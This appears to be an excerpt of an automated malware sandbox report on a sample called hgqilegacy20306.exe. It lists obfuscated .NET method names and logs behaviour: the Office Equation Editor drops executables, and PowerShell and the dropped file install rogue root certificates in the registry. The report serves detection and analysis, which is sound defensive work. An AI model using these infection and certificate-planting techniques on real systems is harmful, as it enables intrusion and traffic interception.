                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, v0c3BnzsGGvxHTnpZq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ebs1uHhiHO', 'Hao1cAbcfb', 'qIQ1bOZDPP', 'LAK1QZBWWy', 'xtq1PwkA1O', 'upK11Rdb9c', 'nFG1eGPsy9'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, EiI4J1gsgEpvMUVeIr.csHigh entropy of concatenated method names: 'AvVPsX52Xk', 'yrFPIWsbO7', 'BAaPmY3Ysn', 'sHgPyxNyah', 'q6NPkkUymK', 'gtWPqQlQJ5', 'lI6Pvd2pri', 'kfCP5aipUr', 'deBPAnUgV8', 'pGJPOgxdv9'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, sstE2rE2FHbpyWHeil.csHigh entropy of concatenated method names: 'QyLmN1trIt', 'bpAmgpjF07', 'rCPmMshCaO', 'wHXm3naUdw', 'mLOmctTHPM', 'Y28mbJCZwg', 'K8AmQI3Vew', 'ua0mPakMIA', 'DZtm1LESoN', 's44menTDNP'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, dVbdYWjrJy6D8mXC3HN.csHigh entropy of concatenated method names: 'V0V17Lrlsa', 'euF16Ff0Ws', 'SJg1wE6CU3', 'ArE1NvZ53S', 'S9o1aHDwXA', 'yhN1gmsQqN', 'gY41tOkoUB', 'i2A1MoedVd', 'K3K13jXEU6', 'njl1Y3ePZB'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, k1ljfRRekjotoW2QGo.csHigh entropy of concatenated method names: 'FH4PGlZaS4', 'xw5PHprckX', 'E6jPd7le3e', 'JfFPh1JS7a', 'sk0PKqpjXb', 'IC5P2h3Fed', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, QnUNhefD2F9UwihjTT.csHigh entropy of concatenated method names: 'efnBqqGBAg', 'uFsBvZt3pj', 'jfNBA97M80', 'lNdBOwyOyj', 'TYwBc7RaWT', 's9gBbTrNPs', 'OT7orF2AP6v02ilR6u', 'j2qM2nWYESVyEb63hP', 'NHOBBsq2Id', 'VatBr5BoRF'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, oQbKyJ809BxJXn8WyT.csHigh entropy of concatenated method names: 'uAkcfwODai', 'NA0c8UgXma', 'ceTcKs6tNl', 'VyicDsKdUH', 'COlcHigPv8', 'UDvcdL9lZC', 'FSmchVySOJ', 'lL0c2ICxRt', 'EMucSwlaBF', 'UdGcEhr5Ib'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, cbW82iCn8DJ8wSMm2p.csHigh entropy of concatenated method names: 'SffkjgIaHA', 'oGNkI1yC23', 'FrwkyIg9rg', 'C09kqjqZWP', 'zKSkv2RVO1', 'ojiyxa0NDh', 'ta1yXA9HnP', 'lipyoDg95t', 'w7yyi3U0mb', 'uf9yCgcbOx'
                Source: 5.2.hgqilegacy20306.exe.349a8a0.8.raw.unpack, FfqA4hD1YFgf9Fce7S.csHigh entropy of concatenated method names: 'U3qrjQn2sV', 'OberstitGJ', 'jcUrI6B4Nf', 'r78rm95Los', 'GNsryCi5JM', 'xOHrkpPH0f', 'k1IrqCk1BV', 'HPnrvB3xHG', 'y8Jr5oG57U', 'natrAMMtBj'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, B5htBfs6Eq60LvMyWr.csHigh entropy of concatenated method names: 'w57qscG8RD', 'x7YqmqC8Eh', 'ocGqkZwtlW', 'YEOkZu65Z3', 'WuCkzB7aRn', 'PLdqFVe9nq', 'or2qBxUlFK', 'ECFqWpjDeU', 'mh8qrHFT6u', 'u7gqUiT0Rl'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, bmncYvqpj1lkAkdaQY.csHigh entropy of concatenated method names: 'Dispose', 'IcXBCLO8dK', 'OprWH8BmSy', 'qyxVVUCACc', 'rWyBZKWZOd', 'ca6BzUmIwp', 'ProcessDialogKey', 'bvsWFFNFRT', 'pHJWB2uDHa', 'vNdWWWcIPj'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, Kfn4gOm6qJR5uQnJ51.csHigh entropy of concatenated method names: 'Cev1B8FA1K', 'C0x1rEctfk', 'lt51UPv0iK', 'g8U1sCb5y0', 'UpQ1IT9URT', 'PXW1yMqku4', 'qL41kVLh3p', 'DaaPoI8YYe', 'HXwPiaOwJN', 'kIBPCnQAKB'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, cTP0ujQ4unMvfM1Q7j.csHigh entropy of concatenated method names: 'T1tuM2V1Z1', 'tmdu3YGU3n', 'r5juGdGarH', 'fBeuHNSPOs', 'reouhLNGS1', 'Tfuu2pAZ9V', 'OlLuE1IDtm', 'u4wundyhXV', 'LZbufJtWM4', 'qUeupD3qq4'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, pCZRiIVyb8gQ36Jscb.csHigh entropy of concatenated method names: 'Cuaq78BXpo', 'eJfq6HMgjS', 'eoNqwvC5rd', 'n9yqNy8V1U', 'D6pqacncpB', 'L0hqgFOoqt', 'dNsqt7eiIE', 'XZWqMtoxh1', 'kC0q3op3cR', 'mYHqYYn5rP'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, cwSp48wlWmdkLMUbRn.csHigh entropy of concatenated method names: 'YEXQiOCpha', 'TaqQZDtBtO', 'DHuPFXYXjy', 'viIPBQ1KGj', 'cX1QpIeU2M', 'P5VQ8MFB9k', 'sU5QLhT4MT', 'yyFQKj8KlP', 'bLLQDB4jdj', 'z3kQ4fxAmt'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, zgULROdx53FtcVdxrb.csHigh entropy of concatenated method names: 'ljHQAuITy9', 'uQMQOvu2MZ', 'ToString', 'aUcQsRUM9K', 'mpVQIWvX1f', 'qFoQm70Zmc', 'mObQyEmfyW', 'hWRQkbnxa3', 'VjFQqVyDSd', 'W3AQvtY0ew'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, UYIMtqoPLcKSuPT8Sm.csHigh entropy of concatenated method names: 'goMIKEWGeg', 'u26IDOFC3S', 'SnuI4VSAbs', 'LY3ITX53PE', 'xDIIxvDqFd', 'UDZIXBCEAA', 'gpGIoKANAZ', 'oGXIijDnAf', 'fn7ICD14NO', 'SnGIZk8esT'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, og6JZM7vcsSTvWXxUG.csHigh entropy of concatenated method names: 'ERRwaHVGW', 'PWUNOYQMo', 'c53gwwlZD', 'TBcta9ZMg', 'gq33w8AIW', 'y8VYB2MGO', 'Q4IiSUo47JKLSEiFBd', 'tMW6m9FUrVTGaqjil8', 'kfvPKDh1i', 'tmveCGFjw'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, v0c3BnzsGGvxHTnpZq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Ebs1uHhiHO', 'Hao1cAbcfb', 'qIQ1bOZDPP', 'LAK1QZBWWy', 'xtq1PwkA1O', 'upK11Rdb9c', 'nFG1eGPsy9'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, EiI4J1gsgEpvMUVeIr.csHigh entropy of concatenated method names: 'AvVPsX52Xk', 'yrFPIWsbO7', 'BAaPmY3Ysn', 'sHgPyxNyah', 'q6NPkkUymK', 'gtWPqQlQJ5', 'lI6Pvd2pri', 'kfCP5aipUr', 'deBPAnUgV8', 'pGJPOgxdv9'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, sstE2rE2FHbpyWHeil.csHigh entropy of concatenated method names: 'QyLmN1trIt', 'bpAmgpjF07', 'rCPmMshCaO', 'wHXm3naUdw', 'mLOmctTHPM', 'Y28mbJCZwg', 'K8AmQI3Vew', 'ua0mPakMIA', 'DZtm1LESoN', 's44menTDNP'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, dVbdYWjrJy6D8mXC3HN.csHigh entropy of concatenated method names: 'V0V17Lrlsa', 'euF16Ff0Ws', 'SJg1wE6CU3', 'ArE1NvZ53S', 'S9o1aHDwXA', 'yhN1gmsQqN', 'gY41tOkoUB', 'i2A1MoedVd', 'K3K13jXEU6', 'njl1Y3ePZB'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, k1ljfRRekjotoW2QGo.csHigh entropy of concatenated method names: 'FH4PGlZaS4', 'xw5PHprckX', 'E6jPd7le3e', 'JfFPh1JS7a', 'sk0PKqpjXb', 'IC5P2h3Fed', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, QnUNhefD2F9UwihjTT.csHigh entropy of concatenated method names: 'efnBqqGBAg', 'uFsBvZt3pj', 'jfNBA97M80', 'lNdBOwyOyj', 'TYwBc7RaWT', 's9gBbTrNPs', 'OT7orF2AP6v02ilR6u', 'j2qM2nWYESVyEb63hP', 'NHOBBsq2Id', 'VatBr5BoRF'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, oQbKyJ809BxJXn8WyT.csHigh entropy of concatenated method names: 'uAkcfwODai', 'NA0c8UgXma', 'ceTcKs6tNl', 'VyicDsKdUH', 'COlcHigPv8', 'UDvcdL9lZC', 'FSmchVySOJ', 'lL0c2ICxRt', 'EMucSwlaBF', 'UdGcEhr5Ib'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, cbW82iCn8DJ8wSMm2p.csHigh entropy of concatenated method names: 'SffkjgIaHA', 'oGNkI1yC23', 'FrwkyIg9rg', 'C09kqjqZWP', 'zKSkv2RVO1', 'ojiyxa0NDh', 'ta1yXA9HnP', 'lipyoDg95t', 'w7yyi3U0mb', 'uf9yCgcbOx'
                Source: 5.2.hgqilegacy20306.exe.56d0000.9.raw.unpack, FfqA4hD1YFgf9Fce7S.csHigh entropy of concatenated method names: 'U3qrjQn2sV', 'OberstitGJ', 'jcUrI6B4Nf', 'r78rm95Los', 'GNsryCi5JM', 'xOHrkpPH0f', 'k1IrqCk1BV', 'HPnrvB3xHG', 'y8Jr5oG57U', 'natrAMMtBj'
                Source: 5.2.hgqilegacy20306.exe.221582c.3.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                Source: 5.2.hgqilegacy20306.exe.2266ca8.2.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                Source: 5.2.hgqilegacy20306.exe.221ee44.5.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                Source: 5.2.hgqilegacy20306.exe.22702c0.4.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                Source: 5.2.hgqilegacy20306.exe.680000.0.raw.unpack, JK.csHigh entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'

                Persistence and Installation Behavior

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\hgqilegacy20306.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
